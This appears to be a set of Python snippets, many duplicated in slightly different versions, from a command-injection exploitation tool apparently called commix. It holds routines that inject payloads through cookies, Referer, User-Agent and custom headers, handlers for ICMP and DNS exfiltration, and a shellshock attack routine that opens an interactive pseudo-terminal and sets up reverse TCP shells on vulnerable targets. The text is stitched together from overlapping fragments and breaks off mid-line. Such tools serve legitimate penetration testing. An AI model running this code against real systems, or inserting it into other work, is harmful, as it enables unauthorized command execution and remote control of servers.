def get_request_response(request): # Check if defined any HTTP Proxy. if menu.options.proxy: try: response = proxy.use_proxy(request) except urllib2.HTTPError, err_msg: if settings.IGNORE_ERR_MSG == False: err_msg = str(err_msg) + "." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print "" print settings.print_critical_msg(err_msg) continue_tests = checks.continue_tests(err) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err_msg) raise SystemExit()
def get_request_response(request): # Check if defined any HTTP Proxy. if menu.options.proxy: try: response = proxy.use_proxy(request) except urllib2.HTTPError, err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print "" if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err_msg: if "Connection refused" in err_msg.reason: err_msg = "The target host is not responding. " err_msg += "Please ensure that is up and try again." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print "" if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err_msg) raise SystemExit()
def referer_injection_test(url, vuln_parameter, payload): def inject_referer(url, vuln_parameter, payload, proxy): if proxy == None: opener = urllib2.build_opener() else: opener = urllib2.build_opener(proxy) request = urllib2.Request(url) # Check if defined extra headers. headers.do_check(request) request.add_header("Referer", urllib.unquote(payload)) response = opener.open(request) return response proxy = None response = inject_referer(url, vuln_parameter, payload, proxy) # Check if defined any HTTP Proxy. if menu.options.proxy: try: proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy}) response = inject_referer(url, vuln_parameter, payload, proxy) except urllib2.HTTPError, err: if settings.IGNORE_ERR_MSG == False: print "\n" + Back.RED + settings.ERROR_SIGN + str(err) + Style.RESET_ALL continue_tests = checks.continue_tests(err) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err: if "Connection refused" in err.reason: print "\n" + Back.RED + settings.CRITICAL_SIGN + "The target host is not responding." + " Please ensure that is up and try again." + Style.RESET_ALL raise SystemExit()
def icmp_exfiltration_handler(url, http_request_method): # You need to have root privileges to run this script if os.geteuid() != 0: print "\n" + Back.RED + settings.ERROR_SIGN + "You need to have root privileges to run this option." + Style.RESET_ALL os._exit(0) if http_request_method == "GET": #url = parameters.do_GET_check(url) vuln_parameter = parameters.vuln_GET_param(url) request = urllib2.Request(url) headers.do_check(request) else: parameter = menu.options.data parameter = urllib2.unquote(parameter) parameter = parameters.do_POST_check(parameter) request = urllib2.Request(url, parameter) headers.do_check(request) vuln_parameter = parameters.vuln_POST_param(parameter, url) # Check if defined any HTTP Proxy. if menu.options.proxy: try: response = proxy.use_proxy(request) except urllib2.HTTPError, err: if settings.IGNORE_ERR_MSG == False: print "\n" + Back.RED + settings.ERROR_SIGN + str(err) + Style.RESET_ALL continue_tests = checks.continue_tests(err) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: os._exit(0)
def custom_header_injection(url, vuln_parameter, payload): def inject_custom_header(url, vuln_parameter, payload, proxy): if proxy == None: opener = urllib2.build_opener() else: opener = urllib2.build_opener(proxy) request = urllib2.Request(url) #Check if defined extra headers. headers.do_check(request) request.add_header(settings.CUSTOM_HEADER_NAME, urllib.unquote(payload)) try: response = opener.open(request) return response except ValueError: pass if settings.TIME_RELATIVE_ATTACK : start = 0 end = 0 start = time.time() proxy = None response = inject_custom_header(url, vuln_parameter, payload, proxy) # Check if defined any HTTP Proxy. if menu.options.proxy: try: proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL : menu.options.proxy}) response = inject_custom_header(url, vuln_parameter, payload, proxy) except urllib2.HTTPError, err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print "" if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err_msg) raise SystemExit()
def cookie_injection(url, vuln_parameter, payload): def inject_cookie(url, vuln_parameter, payload, proxy): if proxy == None: opener = urllib2.build_opener() else: opener = urllib2.build_opener(proxy) if settings.TIME_RELATIVE_ATTACK : payload = urllib.quote(payload) opener.addheaders.append(('Cookie', vuln_parameter + "=" + payload)) request = urllib2.Request(url) # Check if defined extra headers. headers.do_check(request) try: response = opener.open(request) return response except ValueError: pass if settings.TIME_RELATIVE_ATTACK : start = 0 end = 0 start = time.time() proxy = None response = inject_cookie(url, vuln_parameter, payload, proxy) # Check if defined any HTTP Proxy. if menu.options.proxy: try: proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL : menu.options.proxy}) response = inject_cookie(url, vuln_parameter, payload, proxy) except urllib2.HTTPError, err: if settings.IGNORE_ERR_MSG == False: err_msg = str(err) + "." print "\n" + settings.print_critical_msg(err_msg) continue_tests = checks.continue_tests(err) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err_msg) raise SystemExit()
def custom_header_injection_test(url, vuln_parameter, payload): def inject_custom_header(url, vuln_parameter, payload, proxy): if proxy == None: opener = urllib2.build_opener() else: opener = urllib2.build_opener(proxy) request = urllib2.Request(url) #Check if defined extra headers. headers.do_check(request) request.add_header(settings.CUSTOM_HEADER_NAME, urllib.unquote(payload)) try: response = opener.open(request) return response except ValueError: pass start = 0 end = 0 start = time.time() proxy = None response = inject_custom_header(url, vuln_parameter, payload, proxy) # Check if defined any HTTP Proxy. if menu.options.proxy: try: proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy}) response = inject_custom_header(url, vuln_parameter, payload, proxy) except urllib2.HTTPError, err: if settings.IGNORE_ERR_MSG == False: print settings.print_error_msg(err) continue_tests = checks.continue_tests(err) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err: if "Connection refused" in err.reason: err_msg = "The target host is not responding." err_msg += " Please ensure that is up and try again." print "\n" + settings.print_critical_msg(err_msg) raise SystemExit()
def cookie_injection_test(url, vuln_parameter, payload): def inject_cookie(url, vuln_parameter, payload, proxy): if proxy == None: opener = urllib2.build_opener() else: opener = urllib2.build_opener(proxy) # Encoding non-ASCII characters payload. payload = urllib.quote(payload) opener.addheaders.append(('Cookie', vuln_parameter + "=" + payload)) request = urllib2.Request(url) # Check if defined extra headers. headers.do_check(request) try: response = opener.open(request) return response except ValueError: pass start = 0 end = 0 start = time.time() proxy = None response = inject_cookie(url, vuln_parameter, payload, proxy) # Check if defined any HTTP Proxy. if menu.options.proxy: try: proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy}) response = inject_cookie(url, vuln_parameter, payload, proxy) except urllib2.HTTPError, err: if settings.IGNORE_ERR_MSG == False: print Back.RED + settings.ERROR_SIGN + str(err) + Style.RESET_ALL continue_tests = checks.continue_tests(err) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err: if "Connection refused" in err.reason: print "\n" + Back.RED + settings.CRITICAL_SIGN + "The target host is not responding." + \ " Please ensure that is up and try again." + Style.RESET_ALL raise SystemExit()
def get_request_response(request): # Check if defined any HTTP Proxy. if menu.options.proxy: try: response = proxy.use_proxy(request) except urllib2.HTTPError, err: if settings.IGNORE_ERR_MSG == False: print "\n" + Back.RED + settings.ERROR_SIGN + str(err) + Style.RESET_ALL continue_tests = checks.continue_tests(err) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err: if "Connection refused" in err.reason: print "\n" + Back.RED + settings.CRITICAL_SIGN + "The target host is not responding." + " Please ensure that is up and try again." + Style.RESET_ALL raise SystemExit()
def user_agent_injection_test(url, vuln_parameter, payload): def inject_user_agent(url, vuln_parameter, payload, proxy): if proxy == None: opener = urllib2.build_opener() else: opener = urllib2.build_opener(proxy) request = urllib2.Request(url) #Check if defined extra headers. headers.do_check(request) payload = urllib.unquote(payload) request.add_header('User-Agent', payload) response = opener.open(request) return response start = 0 end = 0 start = time.time() proxy = None response = inject_user_agent(url, vuln_parameter, payload, proxy) # Check if defined any HTTP Proxy. if menu.options.proxy: try: proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy}) response = inject_user_agent(url, vuln_parameter, payload, proxy) except urllib2.HTTPError, err: if settings.IGNORE_ERR_MSG == False: print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL continue_tests = checks.continue_tests(err) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err: if "Connection refused" in err.reason: print "\n" + Back.RED + "(x) Critical: The target host is not responding." + \ " Please ensure that is up and try again." + Style.RESET_ALL raise SystemExit()
def cookie_injection_test(url, vuln_parameter, payload): def inject_cookie(url, vuln_parameter, payload, proxy): if proxy == None: opener = urllib2.build_opener() else: opener = urllib2.build_opener(proxy) opener.addheaders.append(('Cookie', vuln_parameter + "=" + payload)) request = urllib2.Request(url) # Check if defined extra headers. headers.do_check(request) try: response = opener.open(request) return response except ValueError: pass proxy = None response = inject_cookie(url, vuln_parameter, payload, proxy) # Check if defined any HTTP Proxy. if menu.options.proxy: try: proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy}) response = inject_cookie(url, vuln_parameter, payload, proxy) except urllib2.HTTPError, err: if settings.IGNORE_ERR_MSG == False: err_msg = str(err) + "." print "\n" + settings.print_error_msg(err_msg) continue_tests = checks.continue_tests(err) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err: if "Connection refused" in err.reason: err_msg = "The target host is not responding." err_msg += " Please ensure that is up and try again." print "\n" + settings.print_critical_msg(err_msg) raise SystemExit()
def get_request_response(request): # Check if defined any HTTP Proxy. if menu.options.proxy: try: response = proxy.use_proxy(request) except urllib2.HTTPError, err: if settings.IGNORE_ERR_MSG == False: print settings.print_error_msg(err) continue_tests = checks.continue_tests(err) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err: if "Connection refused" in err.reason: err_msg = "The target host is not responding." err_msg += " Please ensure that is up and try again." print "\n" + settings.print_critical_msg(err_msg) raise SystemExit()
def dns_exfiltration_handler(url, http_request_method): # Check injection state settings.DETECTION_PHASE = True settings.EXPLOITATION_PHASE = False # You need to have root privileges to run this script if os.geteuid() != 0: err_msg = "You need to have root privileges to run this option." print "\n" + settings.print_critical_msg(err_msg) os._exit(0) if http_request_method == "GET": #url = parameters.do_GET_check(url) vuln_parameter = parameters.vuln_GET_param(url) request = urllib2.Request(url) headers.do_check(request) else: parameter = menu.options.data parameter = urllib2.unquote(parameter) parameter = parameters.do_POST_check(parameter) request = urllib2.Request(url, parameter) headers.do_check(request) vuln_parameter = parameters.vuln_POST_param(parameter, url) # Check if defined any HTTP Proxy. if menu.options.proxy: try: response = proxy.use_proxy(request) except urllib2.HTTPError, err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." print "\n" + settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: os._exit(0)
def authentication_process(): auth_url = menu.options.auth_url auth_data = menu.options.auth_data cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) request = opener.open(urllib2.Request(auth_url)) cookies = "" for cookie in cj: cookie_values = cookie.name + "=" + cookie.value + "; " cookies += cookie_values if len(cookies) != 0 : menu.options.cookie = cookies.rstrip() if menu.options.verbose: success_msg = "The received cookie is " + Style.UNDERLINE success_msg += menu.options.cookie + Style.RESET_ALL + "." print settings.print_success_msg(success_msg) urllib2.install_opener(opener) request = urllib2.Request(auth_url, auth_data) # Check if defined extra headers. headers.do_check(request) # Check if defined any HTTP Proxy. if menu.options.proxy: try: response = proxy.use_proxy(request) except urllib2.HTTPError, err_msg: if settings.IGNORE_ERR_MSG == False: print "\n" + settings.print_error_msg(err_msg) continue_tests = checks.continue_tests(err) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False
def cookie_injection(url, vuln_parameter, payload): def inject_cookie(url, vuln_parameter, payload, proxy): if proxy == None: opener = urllib2.build_opener() else: opener = urllib2.build_opener(proxy) if settings.TIME_RELATIVE_ATTACK: payload = urllib.quote(payload) # Check if defined POST data if menu.options.data: menu.options.data = settings.USER_DEFINED_POST_DATA request = urllib2.Request(url, menu.options.data) else: url = parameters.get_url_part(url) request = urllib2.Request(url) #Check if defined extra headers. headers.do_check(request) request.add_header( 'Cookie', menu.options.cookie.replace(settings.INJECT_TAG, payload)) try: headers.check_http_traffic(request) response = opener.open(request) return response except ValueError: pass if settings.TIME_RELATIVE_ATTACK: start = 0 end = 0 start = time.time() proxy = None #response = inject_cookie(url, vuln_parameter, payload, proxy) # Check if defined any HTTP Proxy. if menu.options.proxy: try: proxy = urllib2.ProxyHandler( {settings.PROXY_PROTOCOL: menu.options.proxy}) response = inject_cookie(url, vuln_parameter, payload, proxy) except urllib2.HTTPError, err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err_msg = str(err_msg) + "." print "\n" + settings.print_critical_msg(err_msg) continue_tests = checks.continue_tests(err) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg) + "." if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err_msg) raise SystemExit()
# Check if defined Tor. elif menu.options.tor: try: response = tor.use_tor(request) except urllib2.HTTPError, err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print "" if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err_msg) raise SystemExit() else: try:
response = False except urllib2.URLError, err: if "Connection refused" in err.reason: print "\n" + Back.RED + settings.CRITICAL_SIGN + "The target host is not responding." + \ " Please ensure that is up and try again." + Style.RESET_ALL raise SystemExit() # Check if defined Tor. elif menu.options.tor: try: response = tor.use_tor(request) except urllib2.HTTPError, err: if settings.IGNORE_ERR_MSG == False: print "\n" + Back.RED + settings.ERROR_SIGN + str( err) + Style.RESET_ALL continue_tests = checks.continue_tests(err) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err: if "Connection refused" in err.reason: print "\n" + Back.RED + settings.CRITICAL_SIGN + "The target host is not responding." + \ " Please ensure that is up and try again." + Style.RESET_ALL raise SystemExit() else: try: response = urllib2.urlopen(request) except urllib2.HTTPError, err:
def shellshock_handler(url, http_request_method, filename): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "results-based command injection" technique = "shellshock injection technique" sys.stdout.write("(*) Testing the "+ technique + "... ") sys.stdout.flush() try: i = 0 total = len(shellshock_cves) * len(headers) for cve in shellshock_cves: for check_header in headers: i = i + 1 attack_vector = "echo " + cve + ":Done;" payload = shellshock_payloads(cve, attack_vector) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL) header = {check_header : payload} request = urllib2.Request(url, None, header) response = urllib2.urlopen(request) if not menu.options.verbose: percent = ((i*100)/total) float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2)) if percent == 100: if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL elif cve in response.info(): percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(float_percent )+"%" sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vuln_parameter = "HTTP Header" vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload) logs.update_payload(filename, counter, payload) if cve in response.info(): no_result = False print Style.BRIGHT + "\n(!) The ("+ check_header + ") '" + Style.UNDERLINE + url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to "+ injection_type +"."+ Style.RESET_ALL print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type.title() + Style.RESET_ALL + "" print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + "" print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL # Enumeration options. if settings.ENUMERATION_DONE == True : print "" while True: enumerate_again = raw_input("(?) Do you want to enumerate again? [Y/n/q] > ").lower() if enumerate_again in settings.CHOISE_YES: enumeration(url, cve, check_header, filename) break elif enumerate_again in settings.CHOISE_NO: break elif enumerate_again in settings.CHOISE_QUIT: sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL pass else: enumeration(url, cve, check_header, filename) # File access options. if settings.FILE_ACCESS_DONE == True : while True: file_access_again = raw_input("(?) Do you want to access files again? [Y/n/q] > ").lower() if file_access_again in settings.CHOISE_YES: file_access(url, cve, check_header, filename) break elif file_access_again in settings.CHOISE_NO: break elif file_access_again in settings.CHOISE_QUIT: sys.exit(0) else: if file_access_again == "": file_access_again = "enter" print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL pass else: file_access(url, cve, check_header, filename) if menu.options.os_cmd: cmd = menu.options.os_cmd shell = cmd_exec(url, cmd, cve, check_header, filename) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL sys.exit(0) else: # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False: print "" gotshell = raw_input("(?) Do you want a Pseudo-Terminal? [Y/n/q] > ").lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" while True: try: cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result) if os_shell_option == False: return False elif os_shell_option == "quit": sys.exit(0) elif os_shell_option == "back": go_back = True break elif os_shell_option == "os_shell": print Fore.YELLOW + "(^) Warning: You are already into an 'os_shell' mode." + Style.RESET_ALL + "\n" elif os_shell_option == "reverse_tcp": # Set up LHOST / LPORT for The reverse TCP connection. lhost, lport = reverse_tcp.configure_reverse_tcp() while True: if lhost and lport in settings.SHELL_OPTIONS: result = checks.check_reverse_tcp_options(lhost) else: cmd = reverse_tcp.reverse_tcp_options(lhost, lport) result = checks.check_reverse_tcp_options(cmd) if result != None: if result == 0: return False elif result == 1 or result == 2: go_back_again = True break # Command execution results. shell = cmd_exec(url, cmd, cve, check_header, filename) if menu.options.verbose: print "" print Back.RED + "(x) Error: The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL else: pass else: shell = cmd_exec(url, cmd, cve, check_header, filename) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" except KeyboardInterrupt: raise except SystemExit: raise except: print "" sys.exit(0) elif gotshell in settings.CHOISE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOISE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL continue break else: continue except urllib2.HTTPError, err: if settings.IGNORE_ERR_MSG == False: print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL continue_tests = checks.continue_tests(err) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit()
def shellshock_handler(url, http_request_method, filename): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "results-based command injection" technique = "shellshock injection technique" info_msg = "Testing the " + technique + "... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() try: i = 0 total = len(shellshock_cves) * len(headers) for cve in shellshock_cves: for check_header in headers: i = i + 1 attack_vector = "echo " + cve + ":Done;" payload = shellshock_payloads(cve, attack_vector) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + settings.print_payload(payload)) header = {check_header : payload} request = urllib2.Request(url, None, header) response = urllib2.urlopen(request) if not menu.options.verbose: percent = ((i*100)/total) float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2)) if str(float_percent) == "100.0": if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL elif cve in response.info(): percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(float_percent )+ "%" info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vuln_parameter = "HTTP Header" vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload) logs.update_payload(filename, counter, payload) if cve in response.info(): no_result = False success_msg = "The (" + check_header + ") '" + Style.UNDERLINE success_msg += url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to " + injection_type + "." print "\n" + settings.print_success_msg(success_msg) print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type.title() + Style.RESET_ALL + "" print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + "" print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL if not menu.options.verbose: print "" # Enumeration options. if settings.ENUMERATION_DONE == True : if menu.options.verbose: print "" while True: question_msg = "Do you want to enumerate again? [Y/n/q] > " enumerate_again = raw_input(settings.print_question_msg(question_msg)).lower() if enumerate_again in settings.CHOICE_YES: enumeration(url, cve, check_header, filename) break elif enumerate_again in settings.CHOICE_NO: break elif enumerate_again in settings.CHOICE_QUIT: sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" err_msg = "'" + enumerate_again + "' is not a valid answer." print settings.print_error_msg(err_msg) + "\n" pass else: enumeration(url, cve, check_header, filename) # File access options. if settings.FILE_ACCESS_DONE == True : while True: question_msg = "Do you want to access files again? [Y/n/q] > " file_access_again = raw_input(settings.print_question_msg(question_msg)).lower() if file_access_again in settings.CHOICE_YES: file_access(url, cve, check_header, filename) break elif file_access_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: sys.exit(0) else: if file_access_again == "": file_access_again = "enter" err_msg = "'" + file_access_again + "' is not a valid answer." print settings.print_error_msg(err_msg) + "\n" pass else: file_access(url, cve, check_header, filename) if menu.options.os_cmd: cmd = menu.options.os_cmd shell, payload = cmd_exec(url, cmd, cve, check_header, filename) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL sys.exit(0) else: # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False: if menu.options.verbose: print "" question_msg = "Do you want a Pseudo-Terminal? [Y/n/q] > " gotshell = raw_input(settings.print_question_msg(question_msg)).lower() if gotshell in settings.CHOICE_YES: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: # Tab compliter if not readline_error: readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result) if os_shell_option == False: if no_result == True: return False else: return True elif os_shell_option == "quit": sys.exit(0) elif os_shell_option == "back": go_back = True break elif os_shell_option == "os_shell": warn_msg = "You are already into an 'os_shell' mode." print settings.print_warning_msg(warn_msg)+ "\n" elif os_shell_option == "reverse_tcp": # Set up LHOST / LPORT for The reverse TCP connection. reverse_tcp.configure_reverse_tcp() while True: if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS: result = checks.check_reverse_tcp_options(settings.LHOST) else: cmd = reverse_tcp.reverse_tcp_options() result = checks.check_reverse_tcp_options(cmd) if result != None: if result == 0: return False elif result == 1 or result == 2: go_back_again = True settings.REVERSE_TCP = False break # Command execution results. shell, payload = cmd_exec(url, cmd, cve, check_header, filename) if menu.options.verbose: print "" err_msg = "The reverse TCP connection to the target host has been failed!" print settings.print_error_msg(err_msg) else: pass else: shell, payload = cmd_exec(url, cmd, cve, check_header, filename) if shell != "": print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" else: if menu.options.verbose: print "\n" + settings.print_payload(payload) err_msg = "The '" + cmd + "' command, does not return any output." print settings.print_error_msg(err_msg) + "\n" except KeyboardInterrupt: raise except SystemExit: raise except: print "" sys.exit(0) elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" err_msg = "'" + gotshell + "' is not a valid answer." print settings.print_error_msg(err_msg) + "\n" continue break else: continue except urllib2.HTTPError, err: if settings.IGNORE_ERR_MSG == False: print "\n" + settings.print_error_msg(err_msg) continue_tests = checks.continue_tests(err) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit()
def custom_header_injection(url, vuln_parameter, payload): def inject_custom_header(url, vuln_parameter, payload, proxy): if proxy == None: opener = _urllib.request.build_opener() else: opener = _urllib.request.build_opener(proxy) # Check if defined POST data if menu.options.data: menu.options.data = settings.USER_DEFINED_POST_DATA request = _urllib.request.Request(url, menu.options.data.encode(settings.UNICODE_ENCODING)) else: url = parameters.get_url_part(url) request = _urllib.request.Request(url) #Check if defined extra headers. headers.do_check(request) payload = checks.newline_fixation(payload) request.add_header(settings.CUSTOM_HEADER_NAME, payload) try: headers.check_http_traffic(request) response = opener.open(request) return response except ValueError: pass if settings.TIME_RELATIVE_ATTACK : start = 0 end = 0 start = time.time() proxy = None #response = inject_custom_header(url, vuln_parameter, payload, proxy) # Check if defined any HTTP Proxy. if menu.options.proxy: try: proxy = _urllib.request.ProxyHandler({settings.SCHEME : menu.options.proxy}) response = inject_custom_header(url, vuln_parameter, payload, proxy) except _urllib.error.HTTPError as err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print("") if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print("") print(settings.print_critical_msg(err)) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except _urllib.error.URLError as err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = 